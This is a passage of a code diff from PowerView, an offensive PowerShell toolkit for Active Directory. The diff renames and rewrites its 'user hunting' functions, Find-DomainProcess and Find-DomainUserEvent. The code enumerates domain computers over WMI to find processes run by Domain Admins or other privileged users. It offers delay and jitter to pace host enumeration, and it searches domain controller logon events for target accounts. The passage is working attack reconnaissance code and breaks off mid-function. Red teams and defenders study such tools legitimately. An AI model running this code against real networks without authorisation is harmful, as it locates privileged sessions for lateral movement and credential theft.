+.PARAMETER Server
- .PARAMETER UserFile
+Specifies an Active Directory server (domain controller) to bind to.
- File of usernames to search for.
+.PARAMETER SearchScope
- .PARAMETER StopOnSuccess
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
- Switch. Stop hunting after finding after finding a target user/process.
+.PARAMETER ResultPageSize
- .PARAMETER NoPing
+Specifies the PageSize to set for the LDAP searcher object.
- Switch. Don't ping each host to ensure it's up before enumerating.
+.PARAMETER ServerTimeLimit
- .PARAMETER Delay
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- Delay between enumerating hosts, defaults to 0
+.PARAMETER Tombstone
- .PARAMETER Jitter
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- Jitter for the host delay, defaults to +/- 0.3
+.PARAMETER Credential
- .PARAMETER Domain
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain and target systems.
- Domain for query for machines, defaults to the current domain.
+.PARAMETER StopOnSuccess
- .PARAMETER DomainController
+Switch. Stop hunting after finding after finding a target user.
- Domain controller to reflect LDAP queries through.
+.PARAMETER Delay
- .PARAMETER ShowAll
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
- Switch. Return all user location results.
+.PARAMETER Jitter
- .PARAMETER SearchForest
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
- Switch. Search all domains in the forest for target users instead of just
- a single domain.
+.PARAMETER Threads
- .PARAMETER Threads
+The number of threads to use for user searching, defaults to 20.
- The maximum concurrent threads to execute.
+.EXAMPLE
- .PARAMETER Credential
+Find-DomainProcess
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target machine/domain.
+Searches for processes run by 'Domain Admins' by enumerating every computer in the domain.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Invoke-ProcessHunter -Domain 'testing'
-
- Finds machines on the 'testing' domain where domain admins have a
- running process.
+Find-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local
- .EXAMPLE
+Enumerates Windows 7 computers in dev.testlab.local and returns any processes being run by
+privileged users in dev.testlab.local.
- PS C:\> Invoke-ProcessHunter -Threads 20
+.EXAMPLE
- Multi-threaded process hunting, replaces Invoke-ProcessHunterThreaded.
+Find-DomainProcess -ProcessName putty.exe
- .EXAMPLE
+Searchings for instances of putty.exe running on the current domain.
- PS C:\> Invoke-ProcessHunter -UserFile users.txt -ComputerFile hosts.txt
-
- Finds machines in hosts.txt where any members of users.txt have running
- processes.
+.EXAMPLE
- .EXAMPLE
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainProcess -Domain testlab.local -Credential $Cred
- PS C:\> Invoke-ProcessHunter -GroupName "Power Users" -Delay 60
-
- Find machines on the domain where members of the "Power Users" groups have
- running processes with a 60 second (+/- *.3) randomized delay between
- touching each host.
+Searches processes being run by 'domain admins' in the testlab.local using the specified alternate credentials.
- .LINK
+.OUTPUTS
- http://blog.harmj0y.net
+PowerView.UserProcess
#>
- [CmdletBinding()]
- param(
- [Parameter(Position=0,ValueFromPipeline=$True)]
- [Alias('Hosts')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUsePSCredentialType', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]
+ [OutputType('PowerView.UserProcess')]
+ [CmdletBinding(DefaultParameterSetName = 'None')]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DNSHostName')]
[String[]]
$ComputerName,
- [ValidateScript({Test-Path -Path $_ })]
- [Alias('HostList')]
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerFile,
+ $Domain,
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerFilter,
+ $ComputerDomain,
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerADSpath,
+ $ComputerLDAPFilter,
+ [ValidateNotNullOrEmpty()]
[String]
- $ProcessName,
+ $ComputerSearchBase,
+
+ [Alias('Unconstrained')]
+ [Switch]
+ $ComputerUnconstrained,
+ [ValidateNotNullOrEmpty()]
+ [Alias('OperatingSystem')]
[String]
- $GroupName = 'Domain Admins',
+ $ComputerOperatingSystem,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ServicePack')]
[String]
- $TargetServer,
+ $ComputerServicePack,
+ [ValidateNotNullOrEmpty()]
+ [Alias('SiteName')]
[String]
- $UserName,
+ $ComputerSiteName,
+ [Parameter(ParameterSetName = 'TargetProcess')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $ProcessName,
+
+ [Parameter(ParameterSetName = 'TargetUser')]
+ [Parameter(ParameterSetName = 'UserIdentity')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $UserIdentity,
+
+ [Parameter(ParameterSetName = 'TargetUser')]
+ [ValidateNotNullOrEmpty()]
[String]
- $UserFilter,
+ $UserDomain,
+ [Parameter(ParameterSetName = 'TargetUser')]
+ [ValidateNotNullOrEmpty()]
[String]
- $UserADSpath,
+ $UserLDAPFilter,
- [ValidateScript({Test-Path -Path $_ })]
+ [Parameter(ParameterSetName = 'TargetUser')]
+ [ValidateNotNullOrEmpty()]
[String]
- $UserFile,
+ $UserSearchBase,
- [Switch]
- $StopOnSuccess,
+ [ValidateNotNullOrEmpty()]
+ [Alias('GroupName', 'Group')]
+ [String[]]
+ $UserGroupIdentity = 'Domain Admins',
+ [Parameter(ParameterSetName = 'TargetUser')]
+ [Alias('AdminCount')]
[Switch]
- $NoPing,
-
- [UInt32]
- $Delay = 0,
-
- [Double]
- $Jitter = .3,
+ $UserAdminCount,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $Domain,
+ $Server,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
- $DomainController,
-
- [Switch]
- $ShowAll,
+ $SearchScope = 'Subtree',
- [Switch]
- $SearchForest,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
- [ValidateRange(1,100)]
+ [ValidateRange(1, 10000)]
[Int]
- $Threads,
+ $ServerTimeLimit,
- [Management.Automation.PSCredential]
- $Credential
- )
+ [Switch]
+ $Tombstone,
- begin {
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
- if ($PSBoundParameters['Debug']) {
- $DebugPreference = 'Continue'
- }
+ [Switch]
+ $StopOnSuccess,
- # random object for delay
- $RandNo = New-Object System.Random
+ [ValidateRange(1, 10000)]
+ [Int]
+ $Delay = 0,
- Write-Verbose "[*] Running Invoke-ProcessHunter with delay of $Delay"
+ [ValidateRange(0.0, 1.0)]
+ [Double]
+ $Jitter = .3,
- #####################################################
- #
- # First we build the host target set
- #
- #####################################################
+ [Int]
+ [ValidateRange(1, 100)]
+ $Threads = 20
+ )
- # if we're using a host list, read the targets in and add them to the target list
- if($ComputerFile) {
- $ComputerName = Get-Content -Path $ComputerFile
+ BEGIN {
+ $ComputerSearcherArguments = @{
+ 'Properties' = 'dnshostname'
+ }
+ if ($PSBoundParameters['Domain']) { $ComputerSearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
+ if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
+ if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
+ if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }
+ if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
+ if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
+ if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
+ if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
+
+ $UserSearcherArguments = @{
+ 'Properties' = 'samaccountname'
+ }
+ if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity }
+ if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain }
+ if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter }
+ if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase }
+ if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount }
+ if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }
+
+
+ # first, build the set of computers to enumerate
+ if ($PSBoundParameters['ComputerName']) {
+ $TargetComputers = $ComputerName
}
-
- if(!$ComputerName) {
- [array]$ComputerName = @()
-
- if($Domain) {
- $TargetDomains = @($Domain)
- }
- elseif($SearchForest) {
- # get ALL the domains in the forest to search
- $TargetDomains = Get-NetForestDomain -DomainController $DomainController -Credential $Credential | ForEach-Object { $_.Name }
- }
- else {
- # use the local domain
- $TargetDomains = @( (Get-NetDomain -Domain $Domain -Credential $Credential).name )
- }
-
- ForEach ($Domain in $TargetDomains) {
- Write-Verbose "[*] Querying domain $Domain for hosts"
- $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -Filter $ComputerFilter -ADSpath $ComputerADSpath
- }
-
- # remove any null target hosts, uniquify the list and shuffle it
- $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
- if($($ComputerName.Count) -eq 0) {
- throw "No hosts found!"
- }
+ else {
+ Write-Verbose '[Find-DomainProcess] Querying computers in the domain'
+ $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
+ }
+ Write-Verbose "[Find-DomainProcess] TargetComputers length: $($TargetComputers.Length)"
+ if ($TargetComputers.Length -eq 0) {
+ throw '[Find-DomainProcess] No hosts found to enumerate'
}
- #####################################################
- #
- # Now we build the user target set
- #
- #####################################################
-
- if(!$ProcessName) {
- Write-Verbose "No process name specified, building a target user set"
-
- # users we're going to be searching for
- $TargetUsers = @()
-
- # if we want to hunt for the effective domain users who can access a target server
- if($TargetServer) {
- Write-Verbose "Querying target server '$TargetServer' for local users"
- $TargetUsers = Get-NetLocalGroup $TargetServer -Recurse | Where-Object {(-not $_.IsGroup) -and $_.IsDomain } | ForEach-Object {
- ($_.AccountName).split("/")[1].toLower()
- } | Where-Object {$_}
- }
- # if we get a specific username, only use that
- elseif($UserName) {
- Write-Verbose "[*] Using target user '$UserName'..."
- $TargetUsers = @( $UserName.ToLower() )
- }
- # read in a target user list if we have one
- elseif($UserFile) {
- $TargetUsers = Get-Content -Path $UserFile | Where-Object {$_}
- }
- elseif($UserADSpath -or $UserFilter) {
- ForEach ($Domain in $TargetDomains) {
- Write-Verbose "[*] Querying domain $Domain for users"
- $TargetUsers += Get-NetUser -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $UserADSpath -Filter $UserFilter | ForEach-Object {
- $_.samaccountname
- } | Where-Object {$_}
- }
- }
- else {
- ForEach ($Domain in $TargetDomains) {
- Write-Verbose "[*] Querying domain $Domain for users of group '$GroupName'"
- $TargetUsers += Get-NetGroupMember -GroupName $GroupName -Domain $Domain -DomainController $DomainController -Credential $Credential| ForEach-Object {
- $_.MemberName
- }
- }
+ # now build the user target set
+ if ($PSBoundParameters['ProcessName']) {
+ $TargetProcessName = @()
+ ForEach ($T in $ProcessName) {
+ $TargetProcessName += $T.Split(',')
}
-
- if ((-not $ShowAll) -and ((!$TargetUsers) -or ($TargetUsers.Count -eq 0))) {
- throw "[!] No users found to search for!"
+ if ($TargetProcessName -isnot [System.Array]) {
+ $TargetProcessName = [String[]] @($TargetProcessName)
}
}
-
- # script block that enumerates a server
+ elseif ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount'] -or $PSBoundParameters['UserAllowDelegation']) {
+ $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname
+ }
+ else {
+ $GroupSearcherArguments = @{
+ 'Identity' = $UserGroupIdentity
+ 'Recurse' = $True
+ }
+ if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain }
+ if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase }
+ if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential }
+ $GroupSearcherArguments
+ $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName
+ }
+
+ # the host enumeration block we're using to enumerate all servers
$HostEnumBlock = {
- param($ComputerName, $Ping, $ProcessName, $TargetUsers, $Credential)
-
- # optionally check if the server is up first
- $Up = $True
- if($Ping) {
- $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName
- }
- if($Up) {
- # try to enumerate all active processes on the remote host
- # and search for a specific process name
- $Processes = Get-NetProcess -Credential $Credential -ComputerName $ComputerName -ErrorAction SilentlyContinue
-
- ForEach ($Process in $Processes) {
- # if we're hunting for a process name or comma-separated names
- if($ProcessName) {
- $ProcessName.split(",") | ForEach-Object {
- if ($Process.ProcessName -match $_) {
+ Param($ComputerName, $ProcessName, $TargetUsers, $Credential)
+
+ ForEach ($TargetComputer in $ComputerName) {
+ $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
+ if ($Up) {
+ # try to enumerate all active processes on the remote host
+ # and search for a specific process name
+ if ($Credential) {
+ $Processes = Get-WMIProcess -Credential $Credential -ComputerName $TargetComputer -ErrorAction SilentlyContinue
+ }
+ else {
+ $Processes = Get-WMIProcess -ComputerName $TargetComputer -ErrorAction SilentlyContinue
+ }
+ ForEach ($Process in $Processes) {
+ # if we're hunting for a process name or comma-separated names
+ if ($ProcessName) {
+ if ($ProcessName -Contains $Process.ProcessName) {
$Process
}
}
- }
- # if the session user is in the target list, display some output
- elseif ($TargetUsers -contains $Process.User) {
- $Process
+ # if the session user is in the target list, display some output
+ elseif ($TargetUsers -Contains $Process.User) {
+ $Process
+ }
}
}
}
}
-
}
- process {
+ PROCESS {
+ # only ignore threading if -Delay is passed
+ if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
- if($Threads) {
- Write-Verbose "Using threading with threads = $Threads"
-
- # if we're using threading, kick off the script block with Invoke-ThreadedFunction
- $ScriptParams = @{
- 'Ping' = $(-not $NoPing)
- 'ProcessName' = $ProcessName
- 'TargetUsers' = $TargetUsers
- 'Credential' = $Credential
- }
-
- # kick off the threaded script block + arguments
- Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
- }
-
- else {
- if(-not $NoPing -and ($ComputerName.count -ne 1)) {
- # ping all hosts in parallel
- $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}
- $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100
- }
-
- Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"
+ Write-Verbose "[Find-DomainProcess] Total number of hosts: $($TargetComputers.count)"
+ Write-Verbose "[Find-DomainProcess] Delay: $Delay, Jitter: $Jitter"
$Counter = 0
+ $RandNo = New-Object System.Random
- ForEach ($Computer in $ComputerName) {
-
+ ForEach ($TargetComputer in $TargetComputers) {
$Counter = $Counter + 1
# sleep for our semi-randomized interval
Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
- Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"
- $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False, $ProcessName, $TargetUsers, $Credential
+ Write-Verbose "[Find-DomainProcess] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
+ $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $TargetProcessName, $TargetUsers, $Credential
$Result
- if($Result -and $StopOnSuccess) {
- Write-Verbose "[*] Target user/process found, returning early"
+ if ($Result -and $StopOnSuccess) {
+ Write-Verbose "[Find-DomainProcess] Target user found, returning early"
return
}
}
}
+ else {
+ Write-Verbose "[Find-DomainProcess] Using threading with threads: $Threads"
+
+ # if we're using threading, kick off the script block with New-ThreadedFunction
+ $ScriptParams = @{
+ 'ProcessName' = $TargetProcessName
+ 'TargetUsers' = $TargetUsers
+ 'Credential' = $Credential
+ }
+
+ # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
+ New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
+ }
}
}
-function Invoke-EventHunter {
+function Find-DomainUserEvent {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Finds logon events on the current (or remote domain) for the specified users.
+
+Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainUser, Get-DomainGroupMember, Get-DomainController, Get-DomainUserEvent, New-ThreadedFunction
+
+.DESCRIPTION
+
+Enumerates all domain controllers from the specified -Domain
+(default of the local domain) using Get-DomainController, enumerates
+the logon events for each using Get-DomainUserEvent, and filters
+the results based on the targeting criteria.
+
+.PARAMETER ComputerName
+
+Specifies an explicit computer name to retrieve events from.
+
+.PARAMETER Domain
+
+Specifies a domain to query for domain controllers to enumerate.
+Defaults to the current domain.
+
+.PARAMETER Filter
+
+A hashtable of PowerView.LogonEvent properties to filter for.
+The 'op|operator|operation' clause can have '&', '|', 'and', or 'or',
+and is 'or' by default, meaning at least one clause matches instead of all.
+See the exaples for usage.
+
+.PARAMETER StartTime
+
+The [DateTime] object representing the start of when to collect events.
+Default of [DateTime]::Now.AddDays(-1).
+
+.PARAMETER EndTime
+
+The [DateTime] object representing the end of when to collect events.
+Default of [DateTime]::Now.
- Queries all domain controllers on the network for account
- logon events (ID 4624) and TGT request events (ID 4768),
- searching for target users.
+.PARAMETER MaxEvents
- Note: Domain Admin (or equiv) rights are needed to query
- this information from the DCs.
+The maximum number of events (per host) to retrieve. Default of 5000.
- Author: @sixdub, @harmj0y
- License: BSD 3-Clause
+.PARAMETER UserIdentity
- .PARAMETER ComputerName
+Specifies one or more user identities to search for.
- Host array to enumerate, passable on the pipeline.
+.PARAMETER UserDomain
- .PARAMETER ComputerFile
+Specifies the domain to query for users to search for, defaults to the current domain.
- File of hostnames/IPs to search.
+.PARAMETER UserLDAPFilter
- .PARAMETER ComputerFilter
+Specifies an LDAP query string that is used to search for target users.
- Host filter name to query AD for, wildcards accepted.
+.PARAMETER UserSearchBase
- .PARAMETER ComputerADSpath
+Specifies the LDAP source to search through for target users.
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
- The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+.PARAMETER UserGroupIdentity
- .PARAMETER GroupName
+Specifies a group identity to query for target users, defaults to 'Domain Admins.
+If any other user specifications are set, then UserGroupIdentity is ignored.
- Group name to query for target users.
+.PARAMETER UserAdminCount
- .PARAMETER TargetServer
+Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged).
- Hunt for users who are effective local admins on a target server.
+.PARAMETER Server
- .PARAMETER UserName
+Specifies an Active Directory server (domain controller) to bind to.
- Specific username to search for.
+.PARAMETER SearchScope
- .PARAMETER UserFilter
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
- A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)"
+.PARAMETER ResultPageSize
- .PARAMETER UserADSpath
+Specifies the PageSize to set for the LDAP searcher object.
- The LDAP source to search through for users, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+.PARAMETER ServerTimeLimit
- .PARAMETER UserFile
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- File of usernames to search for.
+.PARAMETER Tombstone
- .PARAMETER NoPing
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- Don't ping each host to ensure it's up before enumerating.
+.PARAMETER Credential
- .PARAMETER Domain
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target computer(s).
- Domain for query for machines, defaults to the current domain.
+.PARAMETER StopOnSuccess
- .PARAMETER DomainController
+Switch. Stop hunting after finding after finding a target user.
- Domain controller to reflect LDAP queries through.
+.PARAMETER Delay
- .PARAMETER SearchDays
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
- Number of days back to search logs for. Default 3.
+.PARAMETER Jitter
- .PARAMETER SearchForest
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
- Switch. Search all domains in the forest for target users instead of just
- a single domain.
+.PARAMETER Threads
- .PARAMETER Threads
+The number of threads to use for user searching, defaults to 20.
- The maximum concurrent threads to execute.
+.EXAMPLE
- .PARAMETER Credential
+Find-DomainUserEvent
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+Search for any user events matching domain admins on every DC in the current domain.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Invoke-EventHunter
+$cred = Get-Credential dev\administrator
+Find-DomainUserEvent -ComputerName 'secondary.dev.testlab.local' -UserIdentity 'john'
- .LINK
+Search for any user events matching the user 'john' on the 'secondary.dev.testlab.local'
+domain controller using the alternate credential
- http://blog.harmj0y.net
+.EXAMPLE
+
+'primary.testlab.local | Find-DomainUserEvent -Filter @{'IpAddress'='192.168.52.200|192.168.52.201'}
+
+Find user events on the primary.testlab.local system where the event matches
+the IPAddress '192.168.52.200' or '192.168.52.201'.
+
+.EXAMPLE
+
+$cred = Get-Credential testlab\administrator
+Find-DomainUserEvent -Delay 1 -Filter @{'LogonGuid'='b8458aa9-b36e-eaa1-96e0-4551000fdb19'; 'TargetLogonId' = '10238128'; 'op'='&'}
+
+Find user events mathing the specified GUID AND the specified TargetLogonId, searching
+through every domain controller in the current domain, enumerating each DC in serial
+instead of in a threaded manner, using the alternate credential.
+
+.OUTPUTS
+
+PowerView.LogonEvent
+
+PowerView.ExplicitCredentialLogon
+
+.LINK
+
+http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/
#>
- [CmdletBinding()]
- param(
- [Parameter(Position=0,ValueFromPipeline=$True)]
- [Alias('Hosts')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUsePSCredentialType', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]
+ [OutputType('PowerView.LogonEvent')]
+ [OutputType('PowerView.ExplicitCredentialLogon')]
+ [CmdletBinding(DefaultParameterSetName = 'Domain')]
+ Param(
+ [Parameter(ParameterSetName = 'ComputerName', Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('dnshostname', 'HostName', 'name')]
+ [ValidateNotNullOrEmpty()]
[String[]]
$ComputerName,
- [ValidateScript({Test-Path -Path $_ })]
- [Alias('HostList')]
+ [Parameter(ParameterSetName = 'Domain')]
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerFile,
+ $Domain,
- [String]
- $ComputerFilter,
+ [ValidateNotNullOrEmpty()]
+ [Hashtable]
+ $Filter,
- [String]
- $ComputerADSpath,
+ [Parameter(ValueFromPipelineByPropertyName = $True)]
+ [ValidateNotNullOrEmpty()]
+ [DateTime]
+ $StartTime = [DateTime]::Now.AddDays(-1),
- [String]
- $GroupName = 'Domain Admins',
+ [Parameter(ValueFromPipelineByPropertyName = $True)]
+ [ValidateNotNullOrEmpty()]
+ [DateTime]
+ $EndTime = [DateTime]::Now,
- [String]
- $TargetServer,
+ [ValidateRange(1, 1000000)]
+ [Int]
+ $MaxEvents = 5000,
+ [ValidateNotNullOrEmpty()]
[String[]]
- $UserName,
-
- [String]
- $UserFilter,
+ $UserIdentity,
+ [ValidateNotNullOrEmpty()]
[String]
- $UserADSpath,
+ $UserDomain,
- [ValidateScript({Test-Path -Path $_ })]
+ [ValidateNotNullOrEmpty()]
[String]
- $UserFile,
-
- [String]
- $Domain,
+ $UserLDAPFilter,
+ [ValidateNotNullOrEmpty()]
[String]
- $DomainController,
+ $UserSearchBase,
- [Int32]
- $SearchDays = 3,
+ [ValidateNotNullOrEmpty()]
+ [Alias('GroupName', 'Group')]
+ [String[]]
+ $UserGroupIdentity = 'Domain Admins',
+ [Alias('AdminCount')]
[Switch]
- $SearchForest,
-
- [ValidateRange(1,100)]
- [Int]
- $Threads,
+ $UserAdminCount,
- [Management.Automation.PSCredential]
- $Credential
- )
+ [Switch]
+ $CheckAccess,
- begin {
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
- if ($PSBoundParameters['Debug']) {
- $DebugPreference = 'Continue'
- }
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
- # random object for delay
- $RandNo = New-Object System.Random
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
- Write-Verbose "[*] Running Invoke-EventHunter"
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
- if($Domain) {
- $TargetDomains = @($Domain)
- }
- elseif($SearchForest) {
- # get ALL the domains in the forest to search
- $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
- }
- else {
- # use the local domain
- $TargetDomains = @( (Get-NetDomain -Credential $Credential).name )
- }
+ [Switch]
+ $Tombstone,
- #####################################################
- #
- # First we build the host target set
- #
- #####################################################
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
- if(!$ComputerName) {
- # if we're using a host list, read the targets in and add them to the target list
- if($ComputerFile) {
- $ComputerName = Get-Content -Path $ComputerFile
- }
- elseif($ComputerFilter -or $ComputerADSpath) {
- [array]$ComputerName = @()
- ForEach ($Domain in $TargetDomains) {
- Write-Verbose "[*] Querying domain $Domain for hosts"
- $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -Filter $ComputerFilter -ADSpath $ComputerADSpath
- }
- }
- else {
- # if a computer specifier isn't given, try to enumerate all domain controllers
- [array]$ComputerName = @()
- ForEach ($Domain in $TargetDomains) {
- Write-Verbose "[*] Querying domain $Domain for domain controllers"
- $ComputerName += Get-NetDomainController -LDAP -Domain $Domain -DomainController $DomainController -Credential $Credential | ForEach-Object { $_.dnshostname}
- }
- }
+ [Switch]
+ $StopOnSuccess,
- # remove any null target hosts, uniquify the list and shuffle it
- $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
- if($($ComputerName.Count) -eq 0) {
- throw "No hosts found!"
- }
- }
+ [ValidateRange(1, 10000)]
+ [Int]
+ $Delay = 0,
- #####################################################
- #
- # Now we build the user target set
- #
- #####################################################
+ [ValidateRange(0.0, 1.0)]
+ [Double]
+ $Jitter = .3,
- # users we're going to be searching for
- $TargetUsers = @()
+ [Int]
+ [ValidateRange(1, 100)]
+ $Threads = 20
+ )
- # if we want to hunt for the effective domain users who can access a target server
- if($TargetServer) {
- Write-Verbose "Querying target server '$TargetServer' for local users"
- $TargetUsers = Get-NetLocalGroup $TargetServer -Recurse | Where-Object {(-not $_.IsGroup) -and $_.IsDomain } | ForEach-Object {
